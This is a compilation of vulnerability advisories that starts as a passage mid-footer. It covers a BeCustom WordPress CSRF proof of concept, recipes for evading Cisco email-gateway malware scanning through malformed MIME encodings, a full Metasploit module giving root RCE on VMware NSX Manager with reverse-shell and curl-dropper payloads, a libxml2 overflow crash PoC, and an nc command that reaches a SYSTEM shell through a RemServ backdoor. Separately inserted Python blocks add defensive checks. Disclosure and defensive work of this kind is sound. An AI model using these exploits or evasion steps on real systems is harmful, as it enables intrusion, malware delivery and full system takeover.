Please approach your vendor support contact in order to receive<br />the patches.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz / @2022<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: BeCustom Wordpress Plugin<br />Vendor URL: https://muffingroup.com/betheme/features/be-custom/<br />Type: Cross-Site Request Forgery [CWE-253]<br />Date found: 2021-10-28<br />Date published: 2022-11-10<br />CVSSv3 Score: 5.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N)<br />CVE: CVE-2022-3747<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />BeTheme BeCustom 1.0.5.2 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Built in-house add-on, perfect for agencies and web developers will let you rebrand<br />Be & WordPress Admin to your own product by replacing all the Be & Muffin logos with<br />own.<br /><br />This tool is supplied exclusively to the customers of Betheme and allows for changes<br />like: complete dashboard customization, replacement of logos, colors management and much<br />more. With just a few clicks, you will turn the Be & Muffin brand into yours, thanks to<br />which you will increase the trust of your customers.<br /><br />Moreover, from now on you can also customize the WPLogin page.<br /><br />(from the vendor's homepage)<br /><br /><br />5. 
VULNERABILITY DETAILS<br />========================<br />The WordPress plugin lacks anti-CSRF protection on all of its functionalities, which<br />ultimately allows an attacker to (amongst others):<br /><br />- Set custom brandings<br />- Enable/Disable BeCustom features<br />- Modify the WP Login view<br />- Modify the BeDashboard texts<br /><br />Since there is no anti-CSRF token protecting these functionalities, they are<br />vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform<br />a variety of attacks as mentioned above.<br /><br />To successfully exploit this vulnerability, a user with the right to access the<br />plugin must be tricked into visiting an arbitrary website while having an authenticated<br />session in the application.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />An exemplary exploit to reset the plugin's configuration:<br /><br /><html><br />  <body><br />    <form action="http://localhost/wp-admin/admin.php?page=be_custom_branding" method="POST"><br />      <input type="hidden" name="betheme_label" value="" /><br />      <input type="hidden" name="betheme_url_slug" value="" /><br />      <input type="hidden" name="replaced_logo_url" value="" /><br />      <input type="hidden" name="replaced_theme_image" value="" /><br />      <input type="hidden" name="replaced_theme_desc" value="" /><br />      <input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" /><br />      <input type="hidden" name="submit" value="Save changes" /><br />      <input type="submit" value="Submit request" /><br />    </form><br />  </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />Update to BeCustom 1.0.5.3<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-10-28: Discovery of the vulnerability<br />2022-10-28: CVE requested from Wordfence (CNA)<br />2022-10-28: Wordfence assigns CVE-2022-3747<br />2022-11-01: Vendor notification<br />2022-11-07: No response. 
Sent another notification.<br />2022-11-08: Opened up a security support case on envato.com<br />2022-11-xx: Vendor publishes version 1.0.5.3 without notification which fixes this issue<br />2022-11-10: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
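The control missing from the plugin in section 5 is a per-user, per-action token that a cross-site form cannot know. As an added example, not code from this advisory or from the BeCustom plugin, the following Python models the check a settings handler should perform before applying a POST such as the one in the proof of concept: the nonce is an HMAC over a time tick, the action name and the user id, accepted for the current and the previous tick (the same shape as WordPress nonces, simplified). The handler name `handle_branding_update`, the secret, the field list and the sample form are assumptions constructed for the demonstration; only the `_wpnonce` field name follows the WordPress convention.

```python
import hashlib
import hmac
import time

# Lifetime of one nonce "tick"; a nonce is accepted for the current and the
# previous tick, so it stays valid for between one and two lifetimes.
NONCE_LIFETIME = 12 * 3600

# Fields the handler is willing to persist (assumed; taken from the hidden
# inputs of the proof-of-concept form).
ALLOWED_FIELDS = {
    "betheme_label", "betheme_url_slug", "replaced_logo_url",
    "replaced_theme_image", "replaced_theme_desc", "replaced_theme_author",
}


def _nonce_for_tick(secret, tick, action, user_id):
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()[:20]


def make_nonce(secret, user_id, action, now=None):
    """Issue a nonce bound to this user and action; the legitimate form embeds it."""
    now = time.time() if now is None else now
    return _nonce_for_tick(secret, int(now // NONCE_LIFETIME), action, user_id)


def verify_nonce(secret, user_id, action, nonce, now=None):
    """Accept the nonce if it matches the current or previous tick (constant-time compare)."""
    if not nonce:
        return False
    now = time.time() if now is None else now
    tick = int(now // NONCE_LIFETIME)
    return any(
        hmac.compare_digest(_nonce_for_tick(secret, t, action, user_id), nonce)
        for t in (tick, tick - 1)
    )


def handle_branding_update(form, session_user, secret, now=None):
    """Hypothetical settings handler: refuse any POST without a valid nonce, then
    persist only whitelisted fields. Returns (status, body)."""
    if not verify_nonce(secret, session_user, "be_custom_branding",
                        form.get("_wpnonce", ""), now):
        return 403, "nonce check failed"
    settings = {k: v for k, v in form.items() if k in ALLOWED_FIELDS}
    return 200, settings


# The proof-of-concept form carries no nonce, so a handler built this way rejects it.
POC_FORM = {
    "betheme_label": "", "betheme_url_slug": "", "replaced_logo_url": "",
    "replaced_theme_image": "", "replaced_theme_desc": "",
    "replaced_theme_author": "Muffin Group 1337", "submit": "Save changes",
}

if __name__ == "__main__":
    secret = b"constructed-demo-secret"  # assumption: a per-site secret
    print(handle_branding_update(POC_FORM, session_user=1, secret=secret))
    legit = dict(POC_FORM, _wpnonce=make_nonce(secret, 1, "be_custom_branding"))
    print(handle_branding_update(legit, session_user=1, secret=secret))
```

Because the nonce is derived from the victim's user id and the action, a token stolen from one page or one user does not authorise a different action or user, and the short lifetime limits replay of a leaked one.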
<pre><code><br />This report is being published within a coordinated disclosure<br />procedure. The researcher has been in contact with the vendor<br />but has not received a satisfactory response within a given time<br />frame. As the attack complexity is low and exploits have already<br />been published by a third party there must be no further delay<br />in making the threats publicly known.<br /><br />The researcher prefers not to take credit for their findings.<br /><br /><br />Evading Malware Detection by Cisco Secure Email Gateways<br />========================================================<br /><br />Cisco Secure Email Gateways, formerly known as Cisco Ironport<br />Email Security Appliances, that are configured to detect<br />malicious email attachments, can easily be circumvented.<br />A remote attacker can leverage error tolerance and different<br />MIME decoding capabilities of email clients, compared with the<br />gateway, to evade detection of malicious payloads by anti-virus<br />components on the gateway.<br /><br />Method 1: Cloaked Base 64<br />-------------------------<br /><br />Step-by-step instructions:<br /><br />1. Prepare an email with the malicious attachment with a<br /> commonplace email client or employing standard MIME encoding,<br /> using content-transfer-encoding base64.<br /><br />2. Insert CR+LF line breaks at random places in the base64<br /> encoded block so that the lines have different lengths,<br /> but in a way that groups of four base64 characters (encoding<br /> three bytes) stay together. This is intended to evade naïve<br /> heuristics to detect base64 even out of context, while not<br /> violating the MIME standard.<br /><br />3. Before the content-transfer-encoding header of the attachment,<br /> insert another contradictory header "Content-Transfer-Encoding:<br /> quoted-printable". This does violate the MIME standard.<br /><br />4. 
Remove any content-length headers of the message, if present.<br /><br />A complete email prepared in this way may look like this:<br /><br />----------------------- begin example -----------------------<br />From: Mallory <mallory@example.com><br />To: Alice <alice@example.com><br />Date: Mon, 27 Jun 2022 18:29:22 +0200<br />Subject: Your present<br />Mime-Version: 1.0<br />Message-Id: <b31a762c.8b44.63b67b5a@example.com><br />Content-type: multipart/mixed; boundary=boundary_ef5dcd26<br /><br />--boundary_ef5dcd26<br />Content-type: text/plain<br />Content-Transfer-Encoding: quoted-printable<br /><br />Here is your present.<br />--boundary_ef5dcd26<br />Content-type: application/octet-stream<br />Content-Disposition: attachment; filename="present.zip"<br />Content-Transfer-Encoding: quoted-printable<br />Content-Transfer-Encoding: base64<br /><br />UEsD<br />BAoAAAAAAN2Q<br />21Q8z1FoRAAAAEQAAAAJABwAZWlj<br />YXIuY29tVVQJAAOh<br />[... more similar lines skipped ...]<br />CwAB<br />BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A<br />AACHAAAAAAA=<br />--boundary_ef5dcd26--<br />----------------------- end example -----------------------<br /><br />Emails prepared in this fashion will pass through affected<br />gateways with a verdict of being clean from malware, even if<br />the attachment is otherwise easily recognizable malware such as<br />the Eicar test virus. Many popular email clients, on the other<br />hand, will present the attached file and faithfully reproduce<br />it upon saving.<br /><br />Affected systems:<br /><br />This exploit was successfully tested with a zip file containing<br />the Eicar test virus and Cisco Secure Email Gateways with AsyncOS<br />14.2.0-620, 14.0.0-698, and others. 
Affected Email Clients were<br />Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build<br />16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit),<br />Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others.<br /><br />Method 2: yEnc Encoding<br />-----------------------<br /><br />yEncode or short yEnc is an encoding typically employed by<br />usenet clients. Some email clients are capable of decoding MIME<br />parts with this encoding, too. A remote attacker using this<br />encoding for a malicious email attachment will evade malware<br />detection by affected gateways but may succeed in delivering<br />the payload to victims if they use particular email clients.<br />Other email clients will store the attachment in an undecoded<br />and thus not directly harmful form.<br /><br />An email prepared in this way may look like this:<br /><br />----------------------- begin example -----------------------<br />From: Mallory <mallory@example.com><br />To: Alice <alice@example.com><br />Date: Mon, 27 Jun 2022 18:29:22 +0200<br />Subject: Your present<br />Mime-Version: 1.0<br />Message-Id: <b31a762c.8b44.63b67b5a@example.com><br />Content-type: multipart/mixed; boundary=boundary_ef5dcd26<br /><br />--boundary_ef5dcd26<br />Content-type: text/plain<br />Content-Transfer-Encoding: quoted-printable<br /><br />Here is your present.<br />--boundary_ef5dcd26<br />Content-type: application/octet-stream<br />Content-Disposition: attachment; filename="present.zip"<br />Content-Transfer-Encoding: x-yencode<br /><br />=ybegin line=128 size=236 name=file.bin<br />[... binary content skipped ...]<br />=yend size=236<br />--boundary_ef5dcd26--<br />----------------------- end example -----------------------<br /><br />Affected Systems:<br /><br />This exploit was successfully tested with a zip file containing<br />the Eicar test virus and Cisco Secure Email Gateways with AsyncOS<br />14.2.0-620, 14.0.0-698, and others. 
An affected Email Client<br />was Mozilla Thunderbird 91.11.0 (64-bit).<br /><br />Method 3: Cloaked Quoted-Printable<br />----------------------------------<br /><br />This method is similar to method 1 with the roles of<br />quoted-printable and base64 swapped. The payload has to<br />be encoded quoted-printable, but with each byte rather than<br />just non-printable bytes encoded and on separate lines with<br />continuation. The contradicting headers now come in the order<br />base64, quoted-printable.<br /><br />An email prepared in this way may look like this:<br /><br />----------------------- begin example -----------------------<br />From: Mallory <mallory@example.com><br />To: Alice <alice@example.com><br />Date: Mon, 27 Jun 2022 18:29:22 +0200<br />Subject: Your present<br />Mime-Version: 1.0<br />Message-Id: <b31a762c.8b44.63b67b5a@example.com><br />Content-type: multipart/mixed; boundary=boundary_ef5dcd26<br /><br />--boundary_ef5dcd26<br />Content-type: text/plain<br />Content-Transfer-Encoding: quoted-printable<br /><br />Here is your present.<br />--boundary_ef5dcd26<br />Content-type: application/octet-stream<br />Content-Disposition: attachment; filename="present.zip"<br />Content-Transfer-Encoding: base64<br />Content-Transfer-Encoding: quoted-printable<br /><br />=50=<br />=4B=<br />=03=<br />=04=<br />[... more similar lines skipped ...]<br />=00=<br />=00=<br />=00=<br />=00=<br />--boundary_ef5dcd26--<br />----------------------- end example -----------------------<br /><br />Affected Systems:<br /><br />This exploit was successfully tested with a zip file containing<br />the Eicar test virus and Cisco Secure Email Gateways with AsyncOS<br />14.2.0-620, 14.0.0-698, and others. 
Affected Email Clients<br />were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1.<br /><br />References<br />----------<br /><br />Code employing the methods presented here and many similar<br />techniques to manipulate MIME encoding can be found on GitHub:<br />https://github.com/noxxi/mime-is-broken<br /><br />Cisco has published an advisory with a workaround<br />facilitating an undocumented feature of the gateway that<br />can be used to block incorrect MIME. This mitigates<br />many cases of the test suite from GitHub, but not all,<br />particularly not the ones presented in this report. URL:<br />https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679<br /><br />End of the report.<br /><br /></code></pre>
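All three methods above share one property a gateway can detect without any malware signature: the attachment part either carries two contradictory Content-Transfer-Encoding headers or a non-standard one (x-yencode). As an added example, not code from the report or from the mime-is-broken repository, the following Python flags such parts and then decodes the body under every declared encoding, so a scanner sees the same bytes a lenient client would, whichever header that client honours. The sample message is constructed in the shape of method 1 (headers quoted-printable then base64, base64 broken at 4-character group boundaries) and carries a harmless marker string instead of a payload; the `yenc_decode` helper is an own implementation of the published yEnc scheme for the method 2 case, and the quoted-printable path covers method 3.

```python
import binascii
import quopri
from email import message_from_string

# Encodings MIME defines; anything else (x-yencode, uuencode, ...) is a client-specific
# extension that a gateway must not pass through as "clean" just because it cannot decode it.
STANDARD_CTE = {"7bit", "8bit", "binary", "quoted-printable", "base64"}


def yenc_decode(text):
    """Decode a yEnc body (lines between =ybegin and =yend): byte = (c - 42) mod 256,
    '=' escapes the next character as (c - 64). Own implementation of the published scheme."""
    out, in_body = bytearray(), False
    for line in text.splitlines():
        if line.startswith("=ybegin"):
            in_body = True
            continue
        if line.startswith("=yend"):
            break
        if not in_body:
            continue
        data, i = line.encode("latin-1"), 0
        while i < len(data):
            c = data[i]
            if c == 0x3D and i + 1 < len(data):  # '=' escape
                i += 1
                c = (data[i] - 64) & 0xFF
            out.append((c - 42) & 0xFF)
            i += 1
    return bytes(out)


def decode_candidates(raw, encodings):
    """Decode the raw body under every declared encoding, since a lenient client may
    honour any one of the contradictory headers. Returns {encoding: bytes}."""
    results = {}
    for enc in encodings:
        e = enc.strip().lower()
        try:
            if e == "base64":
                # non-strict decoding ignores the irregular CR+LF breaks of cloaked base64
                results[e] = binascii.a2b_base64(raw.encode("ascii", "ignore"))
            elif e == "quoted-printable":
                results[e] = quopri.decodestring(raw.encode("latin-1"))
            elif e in ("x-yencode", "x-yenc", "yenc"):
                results[e] = yenc_decode(raw)
            else:  # 7bit / 8bit / binary / unknown: take the body as it is
                results[e] = raw.encode("latin-1", "replace")
        except (binascii.Error, ValueError):
            results[e] = b""
    return results


def analyze_message(raw_message, signature):
    """Flag parts with more than one or a non-standard Content-Transfer-Encoding header
    and scan every decoding candidate for the signature bytes."""
    findings = []
    for part in message_from_string(raw_message).walk():
        if part.is_multipart():
            continue
        ctes = [c.strip() for c in part.get_all("Content-Transfer-Encoding", [])]
        reasons = []
        if len(ctes) > 1:
            reasons.append("multiple Content-Transfer-Encoding headers: " + ", ".join(ctes))
        reasons += ["non-standard encoding " + c for c in ctes if c.lower() not in STANDARD_CTE]
        decoded = decode_candidates(part.get_payload(), ctes or ["7bit"])
        hits = [enc for enc, data in decoded.items() if signature in data]
        if hits:
            reasons.append("signature matched after decoding as " + ", ".join(hits))
        if reasons:
            findings.append({"filename": part.get_filename(), "encodings": ctes, "reasons": reasons})
    return findings


# Constructed sample in the shape of method 1; the base64 decodes to a harmless marker.
SIGNATURE = b"TEST-MARKER"
SAMPLE_CLOAKED_BASE64 = (
    "From: sender@example.invalid\nTo: recipient@example.invalid\n"
    "Subject: constructed sample\nMime-Version: 1.0\n"
    "Content-Type: multipart/mixed; boundary=b1\n\n"
    "--b1\nContent-Type: text/plain\nContent-Transfer-Encoding: quoted-printable\n\n"
    "Here is your file.\n"
    "--b1\nContent-Type: application/octet-stream\n"
    'Content-Disposition: attachment; filename="sample.bin"\n'
    "Content-Transfer-Encoding: quoted-printable\nContent-Transfer-Encoding: base64\n\n"
    "Q09O\nU1RSVUNU\nRUQtVEVTVC1N\nQVJLRVIh\n"
    "--b1--\n"
)

if __name__ == "__main__":
    for finding in analyze_message(SAMPLE_CLOAKED_BASE64, SIGNATURE):
        print(finding)
```

The header check alone is enough to quarantine or strip the attachment; decoding every candidate is what closes the gap the report describes, where the gateway picks one interpretation and the client another.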
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'VMware NSX Manager XStream unauthenticated RCE',<br />        'Description' => %q{<br />          VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.<br />          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.<br />          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),<br />          a malicious actor can get remote code execution in the context of 'root' on the appliance.<br />          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13<br />          are vulnerable to Remote Command Injection.<br /><br />          This module exploits the vulnerability to upload and execute payloads gaining root privileges.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'h00die-gr3y', # metasploit module author<br />          'Sina Kheirkhah', # Security researcher (Source Incite)<br />          'Steven Seeley' # Security researcher (Source Incite)<br />        ],<br />        'References' => [<br />          ['CVE', '2021-39144'],<br />          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],<br />          ['URL', 'https://kb.vmware.com/s/article/89809'],<br />          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],<br />          ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']<br />        ],<br />        'DisclosureDate' => '2022-10-25',<br />        'Platform' => ['unix', 'linux'],<br />        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br />        'Privileged' => true,<br />        'Targets' => [<br />          [<br />            'Unix (In-Memory)',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :in_memory,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_bash'<br />              }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X64],<br />              'Type' => :linux_dropper,<br />              'CmdStagerFlavor' => [ 'curl', 'printf' ],<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'RPORT' => 443,<br />          'SSL' => true<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br />  end<br /><br />  def check_nsx_v_mgr<br />    return send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, 'login.jsp')<br />    })<br />  rescue StandardError => e<br />    elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br />    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    b64 = Rex::Text.encode_base64(cmd)<br />    random_uri = rand_text_alphanumeric(4..10)<br />    xml_payload = <<~XML<br />      <sorted-set><br />        <string>foo</string><br />        <dynamic-proxy><br />          <interface>java.lang.Comparable</interface><br />          <handler class="java.beans.EventHandler"><br />            <target class="java.lang.ProcessBuilder"><br />              <command><br />                <string>bash</string><br />                <string>-c</string><br />                <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string><br />              </command><br />            </target><br />            <action>start</action><br />          </handler><br />        </dynamic-proxy><br />      </sorted-set><br />    XML<br /><br />    return send_request_cgi({<br />      'method' => 'PUT',<br />      'ctype' => 'application/xml',<br />      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),<br />      'data' => xml_payload<br />    })<br />  rescue StandardError => e<br />    elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br />    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br />  end<br /><br />  # Checking if the target is potentially vulnerable by checking the http title "VMware Appliance Management"<br />  # that indicates the target is running VMware NSX Manager (NSX-V)<br />  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable<br />  def check<br />    print_status("Checking if #{peer} can be exploited.")<br />    res = check_nsx_v_mgr<br />    return CheckCode::Unknown('No response received from the target!') unless res<br /><br />    html = res.get_html_document<br />    html_title = html.at('title')<br />    if html_title.nil? || html_title.text != 'VMware Appliance Management'<br />      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')<br />    end<br /><br />    CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')<br />  end<br /><br />  def exploit<br />    case target['Type']<br />    when :in_memory<br />      print_status("Executing #{target.name} with #{payload.encoded}")<br />      execute_command(payload.encoded)<br />    when :linux_dropper<br />      print_status("Executing #{target.name}")<br />      execute_cmdstager<br />    end<br />  end<br />end<br /></code></pre>
<pre><code>libxml2: Integer overflow in xmlParseNameComplex<br /><br />libxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters).<br /><br />```<br />static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) {<br />int len = 0, l;<br />[...]<br />return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));<br />}<br />```<br /><br />If the name is greater than or equal to 2**32 characters, then `len` overflows. The calculation for the second argument to xmlDictLookup (`ctxt->input->cur - len`) will point to an address outside of the buffer such as adding 0x80000000 to `cur`.<br /><br />Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. Though similar to Felix’s report [\(CVE-2022-29824\)](https://gitlab.gnome.org/GNOME/libxml2/-/issues/351) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this.<br /><br />_Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? 
Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._<br /><br />Proof of Concept:<br />```<br />$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml<br />$ ./xmllint --huge /tmp/name_big.xml<br /><br /><br />Program received signal SIGSEGV, Segmentation fault.<br />__strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77<br />77 ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory.<br />(gdb) bt<br />#0 __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77<br />#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)<br /> at /usr/local/google/home/maddiestone/libxml2/dict.c:878<br />#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617<br />#3 0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682<br />#4 0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729<br />#5 0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754<br />#6 0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407<br />#7 0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165<br />#8 0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0)<br /> at /usr/local/google/home/maddiestone/libxml2/parser.c:17044<br />#9 0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128)<br /> at 
/usr/local/google/home/maddiestone/libxml2/parser.c:17109<br />#10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0)<br /> at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366<br />#11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757<br />(gdb) up<br />#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)<br /> at /usr/local/google/home/maddiestone/libxml2/dict.c:878<br />878 l = strlen((const char *) name);<br />(gdb) up<br />#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617<br />3617 return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));<br />(gdb) p/x len<br />$5 = 0x80000000<br />(gdb) p/x $_siginfo<br />$6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 <repeats 26 times>}, _kill = {si_pid = 0xf795602e,<br /> si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e,<br /> si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0,<br /> si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = {<br /> si_band = 0x7ffff795602e, si_fd = 0x0}}}<br />(gdb) p/x ctxt->input->cur<br />$7 = 0x7fff7795602e<br />```<br /><br />Related CVE Numbers: CVE-2022-29824,CVE-2022-40303.<br /><br /><br /><br />Found by: Google Security Research<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.RemServ.d<br />Vulnerability: Unauthenticated Remote Command Execution<br />Family: RemServ<br />Type: PE32<br />MD5: 05a082d441d9cf365749c0e1eb904c85<br />Vuln ID: MVID-2022-0655<br />Disclosure: 11/11/2022<br />Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 26103<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\>whoami<br />whoami<br />nt authority\system<br /><br />C:\>net user<br />net user<br /><br />User accounts for \\<br /><br />----------------------------------------------------------------------------<br />Administrator DefaultAccount Guest<br />Victim WDAGUtilityAccount<br />The command completed with one or more errors.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
